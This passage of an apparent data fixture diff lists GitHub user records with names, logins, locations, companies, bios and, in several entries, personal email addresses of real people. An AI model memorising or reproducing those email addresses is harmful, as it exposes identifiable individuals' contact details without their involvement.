1, + "followers_count": 347, + "public_gists_count": 8, + "public_repositories_count": 39, + "created_at": "2010-10-16T11:36:30Z", + "updated_at": "2024-09-07T21:54:18Z", + "node_id": "MDQ6VXNlcjQ0MTc3NA==", + "bio": "Hi. I'm Bruno, a founding engineer based in Goiás, Brazil. Some things that I love: automation, creating UI, scaling software, and working with users.", + "is_hireable": true, + "twitter_username": "brunowego" + } +}, +{ + "model": "github.user", + "pk": 1626, + "fields": { + "nest_created_at": "2024-09-12T00:19:24.012Z", + "nest_updated_at": "2024-09-12T00:19:24.012Z", + "name": "SitoRBJ", + "login": "SitoRBJ", + "email": "sitoruizbravo@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8913336?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 16, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2014-09-25T10:09:07Z", + "updated_at": "2024-02-02T08:18:47Z", + "node_id": "MDQ6VXNlcjg5MTMzMzY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1627, + "fields": { + "nest_created_at": "2024-09-12T00:19:25.230Z", + "nest_updated_at": "2024-09-22T19:26:48.887Z", + "name": "Lukas Fischer", + "login": "o1oo11oo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1590475?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 9, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2012-03-30T13:24:34Z", + "updated_at": "2024-09-12T21:47:56Z", + "node_id": "MDQ6VXNlcjE1OTA0NzU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1628, + "fields": { + "nest_created_at": "2024-09-12T00:19:29.768Z", + "nest_updated_at": "2024-09-22T19:26:44.689Z", + "name": "Max", + "login": "moxli", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26149616?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 5, + "created_at": "2017-03-02T20:03:31Z", + "updated_at": "2024-09-09T09:24:26Z", + "node_id": "MDQ6VXNlcjI2MTQ5NjE2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1629, + "fields": { + "nest_created_at": "2024-09-12T00:19:34.046Z", + "nest_updated_at": "2024-09-12T00:19:34.046Z", + "name": "Harm Geerts", + "login": "Urth", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/654042?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 3, + "public_repositories_count": 12, + "created_at": "2011-03-06T15:09:20Z", + "updated_at": "2024-07-10T12:35:54Z", + "node_id": "MDQ6VXNlcjY1NDA0Mg==", + "bio": "Harm Geerts", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1630, + "fields": { + "nest_created_at": "2024-09-12T00:19:35.282Z", + "nest_updated_at": "2024-09-12T00:19:35.282Z", + "name": "dima steklar", + "login": "Dstklr", + "email": "dsteklar@cisco.com", + "avatar_url": "https://avatars.githubusercontent.com/u/28775559?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2017-05-18T07:09:10Z", + "updated_at": "2024-08-28T12:55:15Z", + "node_id": "MDQ6VXNlcjI4Nzc1NTU5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1631, + "fields": { + "nest_created_at": "2024-09-12T00:19:41.947Z", + "nest_updated_at": "2024-09-12T00:19:41.947Z", + "name": "Nir Zezak", + "login": "nierz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59607155?v=4", + "company": "@cisco-eti", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-01-07T11:54:38Z", + "updated_at": "2024-09-05T11:21:33Z", + "node_id": "MDQ6VXNlcjU5NjA3MTU1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1632, + "fields": { + "nest_created_at": "2024-09-12T00:19:43.167Z", + "nest_updated_at": "2024-09-12T00:19:43.167Z", + "name": "Alon Katz", + "login": "Alon-Katz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7746785?v=4", + "company": "", + "location": "Israel", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2014-05-30T13:04:35Z", + "updated_at": "2024-09-04T11:36:41Z", + "node_id": "MDQ6VXNlcjc3NDY3ODU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1633, + "fields": { + "nest_created_at": "2024-09-12T00:19:47.837Z", + "nest_updated_at": "2024-09-12T00:19:49.044Z", + "name": "Danil Smirnov", + "login": "danil-smirnov", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/27999539?v=4", + "company": "", + "location": "Riga, Latvia", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 38, + "created_at": "2017-04-25T09:21:35Z", + "updated_at": "2024-08-07T11:59:02Z", + "node_id": "MDQ6VXNlcjI3OTk5NTM5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1634, + "fields": { + "nest_created_at": "2024-09-12T00:19:50.285Z", + "nest_updated_at": "2024-09-12T00:19:57.695Z", + "name": "", + "login": "kaz-33", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52995191?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-07-17T07:42:14Z", + "updated_at": "2024-07-02T11:53:33Z", + "node_id": "MDQ6VXNlcjUyOTk1MTkx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1635, + "fields": { + "nest_created_at": "2024-09-12T00:19:53.191Z", + "nest_updated_at": "2024-09-20T18:23:20.743Z", + "name": "Philip Voß", + "login": "vo55", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13383229?v=4", + "company": "", + "location": "Münster", + "collaborators_count": 0, + "following_count": 35, + "followers_count": 19, + "public_gists_count": 1, + "public_repositories_count": 22, + "created_at": "2015-07-17T15:39:18Z", + "updated_at": "2024-08-23T18:05:50Z", + "node_id": "MDQ6VXNlcjEzMzgzMjI5", + "bio": "

", + "is_hireable": false, + "twitter_username": "BarwiPhilip" + } +}, +{ + "model": "github.user", + "pk": 1636, + "fields": { + "nest_created_at": "2024-09-12T00:19:56.471Z", + "nest_updated_at": "2024-09-22T19:26:41.695Z", + "name": "Boris Shek", + "login": "BorisShek", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/152714414?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-12-02T15:26:39Z", + "updated_at": "2024-08-13T11:19:06Z", + "node_id": "U_kgDOCRo8rg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1637, + "fields": { + "nest_created_at": "2024-09-12T00:19:59.295Z", + "nest_updated_at": "2024-09-12T00:20:01.773Z", + "name": "LittleCake", + "login": "DiiBBz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36804951?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-02-25T01:30:11Z", + "updated_at": "2024-08-15T11:20:56Z", + "node_id": "MDQ6VXNlcjM2ODA0OTUx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1638, + "fields": { + "nest_created_at": "2024-09-12T00:20:03.860Z", + "nest_updated_at": "2024-09-22T19:26:35.857Z", + "name": "Samreet Singh", + "login": "Reet00", + "email": "samreet.singh@iteratec.com", + "avatar_url": "https://avatars.githubusercontent.com/u/76646161?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-12-27T09:40:40Z", + "updated_at": "2024-09-17T08:24:41Z", + "node_id": "MDQ6VXNlcjc2NjQ2MTYx", + "bio": "@secureCodeBox ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1639, + "fields": { + "nest_created_at": "2024-09-12T00:20:05.080Z", + "nest_updated_at": "2024-09-22T19:26:42.328Z", + "name": "Michael Kruggel", + "login": "Michael-Kruggel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/108417058?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-06-29T14:56:27Z", + "updated_at": "2024-09-12T17:10:50Z", + "node_id": "U_kgDOBnZQIg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1640, + "fields": { + "nest_created_at": "2024-09-12T00:20:07.102Z", + "nest_updated_at": "2024-09-12T01:18:42.705Z", + "name": "", + "login": "release-drafter[bot]", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/in/14356?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-07-04T12:15:06Z", + "updated_at": "2018-07-04T12:15:06Z", + "node_id": "MDM6Qm90NDA4MjkwODI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1641, + "fields": { + "nest_created_at": "2024-09-12T00:20:25.752Z", + "nest_updated_at": "2024-09-22T19:26:33.643Z", + "name": "", + "login": "the-simmon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41528189?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-07-22T00:56:25Z", + "updated_at": "2023-11-21T11:51:56Z", + "node_id": "MDQ6VXNlcjQxNTI4MTg5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1642, + "fields": { + "nest_created_at": "2024-09-12T00:21:08.797Z", + "nest_updated_at": "2024-09-22T19:28:05.176Z", + "name": "Alexander v. Buchholtz", + "login": "albuch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9433608?v=4", + "company": "@Qudosoft @K-MailOrder ", + "location": "Berlin", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 17, + "public_gists_count": 3, + "public_repositories_count": 16, + "created_at": "2014-10-28T14:30:01Z", + "updated_at": "2024-09-19T11:33:22Z", + "node_id": "MDQ6VXNlcjk0MzM2MDg=", + "bio": "SVP Architecture & Technology @K-MailOrder ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1643, + "fields": { + "nest_created_at": "2024-09-12T00:21:13.175Z", + "nest_updated_at": "2024-09-12T00:21:13.175Z", + "name": "Matthew de Detrich", + "login": "mdedetrich", + "email": "mdedetrich@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2337269?v=4", + "company": "Aiven", + "location": "Berlin, Germany", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 88, + "public_gists_count": 19, + "public_repositories_count": 288, + "created_at": "2012-09-13T07:06:55Z", + "updated_at": "2024-08-19T08:59:14Z", + "node_id": "MDQ6VXNlcjIzMzcyNjk=", + "bio": "Open source engineer @ Aiven, working on Kafka", + "is_hireable": false, + "twitter_username": "mdedetrich" + } +}, +{ + "model": "github.user", + "pk": 1644, + "fields": { + "nest_created_at": "2024-09-12T00:21:14.414Z", + "nest_updated_at": "2024-09-22T19:26:52.442Z", + "name": "Costas Simatos", + "login": "costas80", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8297297?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2014-07-29T07:59:04Z", + "updated_at": "2024-07-27T09:43:21Z", + "node_id": "MDQ6VXNlcjgyOTcyOTc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1645, + "fields": { + "nest_created_at": "2024-09-12T00:21:53.370Z", + "nest_updated_at": "2024-09-22T19:27:18.330Z", + "name": "dependency-check", + "login": "dependency-check", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50874977?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 26, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2019-05-21T13:25:11Z", + "updated_at": "2019-09-20T21:09:27Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjUwODc0OTc3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1646, + "fields": { + "nest_created_at": "2024-09-12T00:21:58.047Z", + "nest_updated_at": "2024-09-12T00:21:58.047Z", + "name": "tduehr", + "login": "tduehr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37545?v=4", + "company": "@nccgroup", + "location": "Chicago, IL", + "collaborators_count": 0, + "following_count": 31, + "followers_count": 68, + "public_gists_count": 2, + "public_repositories_count": 66, + "created_at": "2008-12-01T15:21:38Z", + "updated_at": "2024-08-14T11:18:36Z", + "node_id": "MDQ6VXNlcjM3NTQ1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1647, + "fields": { + "nest_created_at": "2024-09-12T00:21:59.321Z", + "nest_updated_at": "2024-09-12T00:21:59.321Z", + "name": "Martin Reinhardt", + "login": "hypery2k", + "email": "martin@m13t.de", + "avatar_url": "https://avatars.githubusercontent.com/u/979121?v=4", + "company": "m13t", + "location": "Hamburg", + "collaborators_count": 0, + "following_count": 85, + "followers_count": 116, + "public_gists_count": 25, + "public_repositories_count": 236, + "created_at": "2011-08-14T11:16:01Z", + "updated_at": "2024-09-09T09:20:36Z", + "node_id": "MDQ6VXNlcjk3OTEyMQ==", + "bio": "Freelancing Coding Architect", + "is_hireable": true, + "twitter_username": "mreinhardt" + } +}, +{ + "model": "github.user", + "pk": 1648, + "fields": { + "nest_created_at": "2024-09-12T00:22:00.593Z", + "nest_updated_at": "2024-09-12T00:22:00.593Z", + "name": "Vladimir Sitnikov", + "login": "vlsi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/213894?v=4", + "company": "Netcracker", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 404, + "public_gists_count": 29, + "public_repositories_count": 202, + "created_at": "2010-03-02T12:51:02Z", + "updated_at": "2024-04-14T07:16:56Z", + "node_id": "MDQ6VXNlcjIxMzg5NA==", + "bio": "Performance Engineer", + "is_hireable": false, + "twitter_username": "VladimirSitnikv" + } +}, +{ + "model": "github.user", + "pk": 1649, + "fields": { + "nest_created_at": "2024-09-12T00:22:01.843Z", + "nest_updated_at": "2024-09-12T00:22:01.843Z", + "name": "Matthew Welby", + "login": "w33v1l", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25647579?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 2, + "created_at": "2017-02-08T20:59:09Z", + "updated_at": "2023-08-16T16:53:32Z", + "node_id": "MDQ6VXNlcjI1NjQ3NTc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1650, + "fields": { + "nest_created_at": "2024-09-12T00:22:02.674Z", + "nest_updated_at": "2024-09-12T00:22:02.674Z", + "name": "Nick Padilla", + "login": "NickPadilla", + "email": "nicholas@monstersoftwarellc.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1381015?v=4", + "company": "Monster Software LLC", + "location": "New Mexico", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2012-01-26T03:43:01Z", + "updated_at": "2024-05-10T00:57:43Z", + "node_id": "MDQ6VXNlcjEzODEwMTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1651, + "fields": { + "nest_created_at": "2024-09-12T00:22:03.901Z", + "nest_updated_at": "2024-09-12T00:22:57.125Z", + "name": "Lars Benedetto", + "login": "lbenedetto", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4466272?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 14, + "public_gists_count": 2, + "public_repositories_count": 33, + "created_at": "2013-05-18T17:19:55Z", + "updated_at": "2024-09-11T16:17:23Z", + "node_id": "MDQ6VXNlcjQ0NjYyNzI=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1652, + "fields": { + "nest_created_at": "2024-09-12T00:22:04.733Z", + "nest_updated_at": "2024-09-12T00:22:04.734Z", + "name": "", + "login": "atpanos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26478584?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2017-03-17T07:35:45Z", + "updated_at": "2024-07-04T11:28:03Z", + "node_id": "MDQ6VXNlcjI2NDc4NTg0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1653, + "fields": { + "nest_created_at": "2024-09-12T00:22:05.675Z", + "nest_updated_at": "2024-09-12T00:22:05.675Z", + "name": "", + "login": "adamtenna", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/107559764?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-06-15T13:22:55Z", + "updated_at": "2024-09-06T13:17:14Z", + "node_id": "U_kgDOBmk7VA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1654, + "fields": { + "nest_created_at": "2024-09-12T00:22:06.490Z", + "nest_updated_at": "2024-09-12T00:29:06.484Z", + "name": "Rainer Schnitker", + "login": "rschnitk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32566006?v=4", + "company": "Ceyoniq Technology GmbH", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-10-06T08:36:54Z", + "updated_at": "2023-08-21T12:01:23Z", + "node_id": "MDQ6VXNlcjMyNTY2MDA2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1655, + "fields": { + "nest_created_at": "2024-09-12T00:22:07.283Z", + "nest_updated_at": "2024-09-12T00:22:07.283Z", + "name": "", + "login": "vidgeus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13273119?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2015-07-10T11:34:13Z", + "updated_at": "2024-06-11T18:30:33Z", + "node_id": "MDQ6VXNlcjEzMjczMTE5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1656, + "fields": { + "nest_created_at": "2024-09-12T00:22:08.103Z", + "nest_updated_at": "2024-09-12T00:22:08.103Z", + "name": "Niklas Baudy", + "login": "vanniktech", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5759366?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 868, + "public_gists_count": 1, + "public_repositories_count": 35, + "created_at": "2013-10-23T19:16:22Z", + "updated_at": "2024-08-16T08:03:34Z", + "node_id": "MDQ6VXNlcjU3NTkzNjY=", + "bio": "Remote Software Engineer", + "is_hireable": true, + "twitter_username": "vanniktech" + } +}, +{ + "model": "github.user", + "pk": 1657, + "fields": { + "nest_created_at": "2024-09-12T00:22:08.917Z", + "nest_updated_at": "2024-09-12T00:22:08.917Z", + "name": "Matthias Kraaz", + "login": "matthiaskraaz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5954500?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2013-11-16T10:42:01Z", + "updated_at": "2024-09-10T16:12:22Z", + "node_id": "MDQ6VXNlcjU5NTQ1MDA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1658, + "fields": { + "nest_created_at": "2024-09-12T00:22:09.739Z", + "nest_updated_at": "2024-09-12T00:22:09.739Z", + "name": "Paul", + "login": "AppearamidGuy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/133590454?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2023-05-14T15:50:29Z", + "updated_at": "2023-06-27T14:27:18Z", + "node_id": "U_kgDOB_Zttg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1659, + "fields": { + "nest_created_at": "2024-09-12T00:22:10.553Z", + "nest_updated_at": "2024-09-12T00:22:10.553Z", + "name": "Víctor Albertos", + "login": "VictorAlbertos", + "email": "me@victoralbertos.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2614726?v=4", + "company": "@ireward", + "location": "Alicante (Spain)", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 369, + "public_gists_count": 17, + "public_repositories_count": 41, + "created_at": "2012-10-21T19:20:08Z", + "updated_at": "2024-01-29T14:49:21Z", + "node_id": "MDQ6VXNlcjI2MTQ3MjY=", + "bio": "Senior Android engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1660, + "fields": { + "nest_created_at": "2024-09-12T00:22:11.378Z", + "nest_updated_at": "2024-09-12T00:22:11.378Z", + "name": "", + "login": "mluckam", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26581168?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 30, + "created_at": "2017-03-21T19:18:04Z", + "updated_at": "2024-04-18T12:03:36Z", + "node_id": "MDQ6VXNlcjI2NTgxMTY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1661, + "fields": { + "nest_created_at": "2024-09-12T00:22:12.213Z", + "nest_updated_at": "2024-09-12T00:22:12.213Z", + "name": "Lukas Prediger", + "login": "LukasPrediger", + "email": "lukas@predigerweb.de", + "avatar_url": "https://avatars.githubusercontent.com/u/56033262?v=4", + "company": "Rewe Digital", + "location": "Cologne", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2019-10-01T13:39:14Z", + "updated_at": "2024-08-08T06:53:35Z", + "node_id": "MDQ6VXNlcjU2MDMzMjYy", + "bio": "Softwaredeveloper @rewe-digital", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1662, + "fields": { + "nest_created_at": "2024-09-12T00:22:13.011Z", + "nest_updated_at": "2024-09-22T19:28:15.664Z", + "name": "Róbert Papp", + "login": "TWiStErRob", + "email": "papp.robert.s@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2906988?v=4", + "company": "Marks and Spencer", + "location": "London, UK", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 342, + "public_gists_count": 14, + "public_repositories_count": 90, + "created_at": "2012-11-28T00:42:44Z", + "updated_at": "2024-08-29T22:28:46Z", + "node_id": "MDQ6VXNlcjI5MDY5ODg=", + "bio": "Tinkering with little green robots", + "is_hireable": true, + "twitter_username": "twisterrob" + } +}, +{ + "model": "github.user", + "pk": 1663, + "fields": { + "nest_created_at": "2024-09-12T00:22:13.837Z", + "nest_updated_at": "2024-09-12T00:22:13.837Z", + "name": "", + "login": "otbutz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22315436?v=4", + "company": "OPTITOOL GmbH", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 38, + "created_at": "2016-09-20T07:39:50Z", + "updated_at": "2024-07-08T08:41:54Z", + "node_id": "MDQ6VXNlcjIyMzE1NDM2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1664, + "fields": { + "nest_created_at": "2024-09-12T00:22:14.695Z", + "nest_updated_at": "2024-09-12T00:22:14.695Z", + "name": "Matt Groth", + "login": "mgroth0", + "email": "mgroth49@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12831489?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 83, + "created_at": "2015-06-10T14:38:57Z", + "updated_at": "2024-08-09T21:43:31Z", + "node_id": "MDQ6VXNlcjEyODMxNDg5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1665, + "fields": { + "nest_created_at": "2024-09-12T00:22:15.922Z", + "nest_updated_at": "2024-09-12T00:22:15.922Z", + "name": "Bruno Azevedo", + "login": "BrunoJAzevedo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15171101?v=4", + "company": "Nutrium", + "location": "Viana do Castelo, Portugal", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 5, + "public_gists_count": 3, + "public_repositories_count": 16, + "created_at": "2015-10-17T13:09:01Z", + "updated_at": "2024-06-21T12:00:04Z", + "node_id": "MDQ6VXNlcjE1MTcxMTAx", + "bio": "MsC Student at Minho University. \r\n\r\nMobile Developer @Zetes\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1666, + "fields": { + "nest_created_at": "2024-09-12T00:22:16.743Z", + "nest_updated_at": "2024-09-12T00:22:16.743Z", + "name": "", + "login": "b-allard", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/21167184?v=4", + "company": "", + "location": "Luxembourg", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2016-08-22T05:49:57Z", + "updated_at": "2024-08-29T07:03:22Z", + "node_id": "MDQ6VXNlcjIxMTY3MTg0", + "bio": "I'm a Mobile Developer, I prefer develop in Android than iOS but it's a personal choice", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1667, + "fields": { + "nest_created_at": "2024-09-12T00:22:17.573Z", + "nest_updated_at": "2024-09-12T00:22:17.573Z", + "name": "İbrahim Halil TOPRAK", + "login": "haliltprkk", + "email": "haliltprkk@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/24190349?v=4", + "company": "@Commencis", + "location": "Samsun, İstanbul", + "collaborators_count": 0, + "following_count": 48, + "followers_count": 31, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2016-11-26T13:49:31Z", + "updated_at": "2024-08-28T12:07:47Z", + "node_id": "MDQ6VXNlcjI0MTkwMzQ5", + "bio": "Software Engineer\r\n", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1668, + "fields": { + "nest_created_at": "2024-09-12T00:22:18.439Z", + "nest_updated_at": "2024-09-12T00:22:18.439Z", + "name": "Jonatan Rhodin", + "login": "Pururun", + "email": "jonatan.rhodin@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1643265?v=4", + "company": "", + "location": "Gothenburg", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 2, + "public_repositories_count": 4, + "created_at": "2012-04-14T15:22:40Z", + "updated_at": "2024-08-07T15:24:44Z", + "node_id": "MDQ6VXNlcjE2NDMyNjU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1669, + "fields": { + "nest_created_at": "2024-09-12T00:22:19.232Z", + "nest_updated_at": "2024-09-12T00:22:19.232Z", + "name": " Stefan Rybacki", + "login": "stefanrybacki", + "email": "stefan.rybacki@limbus-medtec.com", + "avatar_url": "https://avatars.githubusercontent.com/u/29799350?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2017-06-30T14:00:34Z", + "updated_at": "2024-09-02T11:22:16Z", + "node_id": "MDQ6VXNlcjI5Nzk5MzUw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1670, + "fields": { + "nest_created_at": "2024-09-12T00:22:20.061Z", + "nest_updated_at": "2024-09-22T19:27:06.989Z", + "name": "Petr H.", + "login": "holubec-petr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10357929?v=4", + "company": "Quadient", + "location": "Hradec Králové", + 